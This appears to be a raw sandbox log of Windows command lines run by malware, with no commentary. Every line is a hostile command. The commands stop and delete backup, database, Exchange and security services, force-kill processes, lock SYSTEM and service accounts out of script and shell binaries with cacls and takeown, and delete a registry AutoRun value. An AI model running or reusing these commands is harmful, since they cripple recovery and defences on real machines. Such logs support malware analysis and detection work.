  • '<SYSTEM32>\net1.exe' stop UFAllNet
  • '<SYSTEM32>\net1.exe' stop U8WebPool
  • '<SYSTEM32>\net1.exe' stop U8TaskService
  • '<SYSTEM32>\net1.exe' stop U8SLReportService
  • '<SYSTEM32>\net1.exe' stop U8SCMPool
  • '<SYSTEM32>\net1.exe' stop U8MPool
  • '<SYSTEM32>\net1.exe' stop U8KeyManagePool
  • '<SYSTEM32>\net1.exe' stop U8GCService
  • '<SYSTEM32>\net1.exe' stop U8EncryptService
  • '<SYSTEM32>\net1.exe' stop U8EISService
  • '<SYSTEM32>\net1.exe' stop NFOTPService
  • '<SYSTEM32>\net1.exe' stop U8DispatchService
  • '<SYSTEM32>\net1.exe' stop NFSysService
  • '<SYSTEM32>\net1.exe' stop TurboCRM70
  • '<SYSTEM32>\net1.exe' stop "NetVault Process Manager"
  • '<SYSTEM32>\net1.exe' stop DGPNPSEV
  • '<SYSTEM32>\net1.exe' stop "ABBYY.Licensing.FineReader.Professional.12.0"
  • '<SYSTEM32>\net1.exe' stop AgentX
  • '<SYSTEM32>\net1.exe' stop "Apple Mobile Device Service"
  • '<SYSTEM32>\net1.exe' stop Mysoft.SchedulingService
  • '<SYSTEM32>\net1.exe' stop "Bonjour Service"
  • '<SYSTEM32>\net1.exe' stop GNWebService
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService1"
  • '<SYSTEM32>\net1.exe' stop U8SendMailAdmin
  • '<SYSTEM32>\net1.exe' stop CobianBackup10
  • '<SYSTEM32>\sc.exe' delete UTUService
  • '<SYSTEM32>\sc.exe' delete UFReportService
  • '<SYSTEM32>\net1.exe' stop pcas
  • '<SYSTEM32>\net1.exe' stop RTCAVMCU
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService$maintenance
  • '<SYSTEM32>\sc.exe' delete "U8WebPool"
  • '<SYSTEM32>\sc.exe' delete VmAgentDaemon
  • '<SYSTEM32>\sc.exe' delete OpenFastAssist
  • '<SYSTEM32>\net1.exe' stop MSExchangeThrottling
  • '<SYSTEM32>\net1.exe' stop TPlusStdTaskService1220
  • '<SYSTEM32>\net1.exe' stop ServiceMid
  • '<SYSTEM32>\sc.exe' delete BackupExecJobEngine
  • '<SYSTEM32>\sc.exe' delete ShareBoxMonitorService
  • '<SYSTEM32>\net1.exe' stop MSExchangeSubmission
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentBrowser
  • '<SYSTEM32>\sc.exe' delete savsvc
  • '<SYSTEM32>\net1.exe' stop TPlusStdAppService1220
  • '<SYSTEM32>\net1.exe' stop tmlisten
  • '<SYSTEM32>\net1.exe' stop MSExchangeServiceHost
  • '<SYSTEM32>\sc.exe' delete BackupExecRPCService
  • '<SYSTEM32>\sc.exe' delete abs_deployer
  • '<SYSTEM32>\net1.exe' stop MySQL
  • '<SYSTEM32>\net1.exe' stop VeeamDistributionSvc
  • '<SYSTEM32>\sc.exe' delete ShareBoxService
  • '<SYSTEM32>\sc.exe' delete BackupExecDeviceMediaService
  • '<SYSTEM32>\net1.exe' stop MSExchangeRPC
  • '<SYSTEM32>\sc.exe' delete bedbg
  • '<SYSTEM32>\sc.exe' delete MysoftUpdate
  • '<SYSTEM32>\net1.exe' stop OracleDBConsoleilas
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc
  • '<SYSTEM32>\net1.exe' stop MSExchangeRepl
  • '<SYSTEM32>\sc.exe' delete BackupExecAgentAccelerator
  • '<SYSTEM32>\sc.exe' delete Mysoft.Setup.InstallService
  • '<SYSTEM32>\net1.exe' stop "OracleOraDb10g_homeliSQL*Plus"
  • '<SYSTEM32>\net1.exe' stop VeeamMountSvc
  • '<SYSTEM32>\sc.exe' delete "Zabbix Agent"
  • '<SYSTEM32>\sc.exe' delete Mysoft.SchedulingService
  • '<SYSTEM32>\net1.exe' stop MSExchangePOP3BE
  • '<SYSTEM32>\sc.exe' delete GPSFtpd
  • '<SYSTEM32>\sc.exe' delete edr_monitor
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc
  • '<SYSTEM32>\net1.exe' stop AutoUpdatePatchService
  • '<SYSTEM32>\net1.exe' stop 360EntPGSvc
  • '<SYSTEM32>\net1.exe' stop NFLicenceServer
  • '<SYSTEM32>\sc.exe' delete "Rpc Monitor"
  • '<SYSTEM32>\sc.exe' delete OfficeClearCache
  • '<SYSTEM32>\net1.exe' stop MySQL5_OA
  • '<SYSTEM32>\sc.exe' delete "EasyFZS Server"
  • '<SYSTEM32>\sc.exe' delete U8SmsSrv
  • '<SYSTEM32>\net1.exe' stop ImtsEventSvr
  • '<SYSTEM32>\net1.exe' stop d_safe
  • '<SYSTEM32>\net1.exe' stop MSExchangeUMCR
  • '<SYSTEM32>\sc.exe' delete Serv-U
  • '<SYSTEM32>\net1.exe' stop DDVRulesProcessor
  • '<SYSTEM32>\net1.exe' stop AngelOfDeath
  • '<SYSTEM32>\sc.exe' delete YunService
  • '<SYSTEM32>\sc.exe' delete KICkSvr
  • '<SYSTEM32>\sc.exe' delete TurboCRM70
  • '<SYSTEM32>\net1.exe' stop MSExchangeUM
  • '<SYSTEM32>\sc.exe' delete EASService
  • '<SYSTEM32>\net1.exe' stop "FileZilla Server"
  • '<SYSTEM32>\net1.exe' stop RavTask
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransportLogSearch
  • '<SYSTEM32>\sc.exe' delete Gailun_Downloader
  • '<SYSTEM32>\sc.exe' delete CIS
  • '<SYSTEM32>\net1.exe' stop K3MobileServiceManage
  • '<SYSTEM32>\net1.exe' stop ClickToRunSvc
  • '<SYSTEM32>\sc.exe' delete TxQBService
  • '<SYSTEM32>\sc.exe' delete "U8WorkerService2"
  • '<SYSTEM32>\net1.exe' stop MSExchangeTransport
  • '<SYSTEM32>\sc.exe' delete MDM
  • '<SYSTEM32>\sc.exe' delete CloudExchangeService
  • '<SYSTEM32>\net1.exe' stop TPlusStdUpgradeService1220
  • '<SYSTEM32>\sc.exe' delete BackupExecManagementService
  • '<SYSTEM32>\sc.exe' delete MSCRMUnzipService
  • '<SYSTEM32>\net1.exe' stop VMnetDHCP
  • '<SYSTEM32>\net1.exe' stop wanxiao-monitor
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\wscript.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\FTP.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d "network service"
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\FTP.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\FTP.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\FTP.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\wscript.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cscript.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\cscript.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cscript.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\cscript.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\wscript.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\wscript.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\mshta.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Administrators:r
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\net.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\net.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g system:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\cmd.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g system:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\cmd.exe /g Administrators:f
  • '<SYSTEM32>\cmd.exe' /S /D /c" echo y"
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\cmd.exe /a
  • '<SYSTEM32>\reg.exe' delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\cmd.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /g Administrators:f
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\mshta.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\mshta.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Administrators:r
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\mshta.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net1.exe /e /g Users:r
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\net1.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d system
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\net1.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f <SYSTEM32>\net1.exe /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\net.exe /e /g Users:r
  • '<SYSTEM32>\net1.exe' stop UIODetect
  • '<SYSTEM32>\sc.exe' delete ZTEVdservice
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d system
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client"
  • '<SYSTEM32>\sc.exe' delete VMTools
  • '<SYSTEM32>\sc.exe' delete UIODetect
  • '<SYSTEM32>\net1.exe' stop XenSvc
  • '<SYSTEM32>\net1.exe' stop UFIDAWebService
  • '<SYSTEM32>\net1.exe' stop VMAuthdService
  • '<SYSTEM32>\sc.exe' delete ImeDictUpdateService
  • '<SYSTEM32>\sc.exe' delete RTCDATAMCU
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client Guard"
  • '<SYSTEM32>\sc.exe' delete MSSQLServerOLAPService
  • '<SYSTEM32>\sc.exe' delete WebAttendServer
  • '<SYSTEM32>\sc.exe' delete JhTask
  • '<SYSTEM32>\sc.exe' delete RTCIMMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdsrv
  • '<SYSTEM32>\sc.exe' delete RTCCDR
  • '<SYSTEM32>\sc.exe' delete QcSoftService
  • '<SYSTEM32>\net1.exe' stop Apache2.4
  • '<SYSTEM32>\sc.exe' delete TCPIDDAService
  • '<SYSTEM32>\net1.exe' stop VMUSBArbService
  • '<SYSTEM32>\sc.exe' delete RTCMEETINGMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdwks
  • '<SYSTEM32>\sc.exe' delete MSSQLSERVER
  • '<SYSTEM32>\sc.exe' delete K3MobileService
  • '<SYSTEM32>\net1.exe' stop Realtek11nSU
  • '<SYSTEM32>\net1.exe' stop "memcached Server"
  • '<SYSTEM32>\sc.exe' delete MSSQLFDLauncher
  • '<SYSTEM32>\sc.exe' delete aspnet_state @sc delete Redis
  • '<SYSTEM32>\sc.exe' delete "UtilDev Web Server Pro"
  • '<SYSTEM32>\net1.exe' stop TeamViewer8
  • '<SYSTEM32>\sc.exe' delete RtcQms
  • '<SYSTEM32>\net1.exe' stop xenlite
  • '<SYSTEM32>\sc.exe' delete TeamViewer
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
  • '<SYSTEM32>\sc.exe' delete "wanxiao-monitor"
  • '<SYSTEM32>\sc.exe' delete SPTimerV4
  • '<SYSTEM32>\sc.exe' delete "Kiwi Syslog Server"
  • '<SYSTEM32>\sc.exe' delete RabbitMQ
  • '<SYSTEM32>\sc.exe' delete "vm-agent"
  • '<SYSTEM32>\net1.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\sc.exe' delete AlibabaProtect
  • '<SYSTEM32>\sc.exe' delete SPSearchHostController
  • '<SYSTEM32>\sc.exe' delete "Flash Helper Service"
  • '<SYSTEM32>\sc.exe' delete ReportServer
  • '<SYSTEM32>\net1.exe' stop mysqltransport
  • '<SYSTEM32>\net1.exe' stop DellDRLogSvc
  • '<SYSTEM32>\sc.exe' delete VMwareHostd
  • '<SYSTEM32>\sc.exe' delete qemu-ga
  • '<SYSTEM32>\sc.exe' delete SPAdminV4
  • '<SYSTEM32>\sc.exe' delete UI0Detect
  • '<SYSTEM32>\sc.exe' delete allpass_redisservice_port21160
  • '<SYSTEM32>\sc.exe' delete VMUSBArbService
  • '<SYSTEM32>\net1.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net1.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net1.exe' stop WebAttendServer
  • '<SYSTEM32>\sc.exe' delete ProjectQueueService16
  • '<SYSTEM32>\sc.exe' delete wwbizsrv
  • '<SYSTEM32>\sc.exe' delete MSDTC
  • '<SYSTEM32>\sc.exe' delete VMAuthdService
  • '<SYSTEM32>\sc.exe' delete MCService
  • '<SYSTEM32>\sc.exe' delete ProjectEventService16
  • '<SYSTEM32>\sc.exe' delete "ZTE FileTranS"
  • '<SYSTEM32>\sc.exe' delete VGAuthService
  • '<SYSTEM32>\net1.exe' stop Apache2.2
  • '<SYSTEM32>\net1.exe' stop MSComplianceAudit
  • '<SYSTEM32>\sc.exe' delete XT800Service_Personal
  • '<SYSTEM32>\net1.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\sc.exe' delete SQLBrowser
  • '<SYSTEM32>\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d system
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d "network service"
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /e /g Users:r
  • '<SYSTEM32>\cacls.exe' C:\Users\Public /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f C:\Users\Public /a
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d system
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d "network service"
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %ALLUSERSPROFILE% /a
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
  • '<SYSTEM32>\cacls.exe' %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
  • '<SYSTEM32>\takeown.exe' /f %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE% /e /d SERVICE
  • '<SYSTEM32>\cacls.exe' <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
  • '<SYSTEM32>\sc.exe' delete FxService
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
  • '<SYSTEM32>\net1.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net1.exe' stop U8WorkerService2
  • '<SYSTEM32>\sc.exe' delete RTCAVMCU
  • '<SYSTEM32>\sc.exe' delete EnergyDataService
  • '<SYSTEM32>\net1.exe' stop VMwareHostd
  • '<SYSTEM32>\sc.exe' delete SQLWriter
  • '<SYSTEM32>\sc.exe' delete OracleVssWriterORCL
  • '<SYSTEM32>\sc.exe' delete ftnlses3
  • '<SYSTEM32>\sc.exe' delete RTCATS
  • '<SYSTEM32>\sc.exe' delete eCardMPService
  • '<SYSTEM32>\sc.exe' delete SQLSERVERAGENT
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1TNSListener
  • '<SYSTEM32>\sc.exe' delete ftnlsv3
  • '<SYSTEM32>\sc.exe' delete REPLICA
  • '<SYSTEM32>\sc.exe' delete OracleServiceORCL
  • '<SYSTEM32>\sc.exe' delete "eCard-TTransServer"
  • '<SYSTEM32>\net1.exe' stop HaoZipSvc
  • '<SYSTEM32>\net1.exe' stop U8WorkerService1
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService
  • '<SYSTEM32>\sc.exe' delete "UWS LoPriv Services"
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1ClrAgent
  • '<SYSTEM32>\sc.exe' delete "XT800Service_Personal"
  • '<SYSTEM32>\sc.exe' delete "DAService_TCP"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
